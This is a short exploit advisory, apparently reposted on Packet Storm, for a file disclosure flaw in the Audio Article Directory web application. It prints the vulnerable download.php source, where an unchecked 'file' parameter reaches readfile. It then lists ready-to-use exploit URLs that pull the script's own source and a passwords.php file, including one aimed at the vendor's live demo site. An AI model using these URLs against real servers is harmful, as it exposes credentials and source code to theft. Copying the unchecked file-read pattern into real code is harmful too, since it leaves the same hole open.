Audio Article Directory suffers from a remote file disclosure vulnerability.
8f506b79a2c0f441b2c1166822241d7f#################################################################################################################
[+] Audio Article Directory Remote File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
Vendor:http://audioarticledirectory.com
#################################################################################################################
Poc
---
Download.php
<?
$file = "./".$_GET['file']; => one
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
header('Content-Length: ' . filesize($file));
@readfile($file) OR die(); => 2
?>
Exploit
----
http://victim/download.php?file=download.php
http://victim/download.php?file=./passwords.php
Demo
----
http://audioarticledirectory.com/demo/download.php?file=./passwords.php
################################################################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!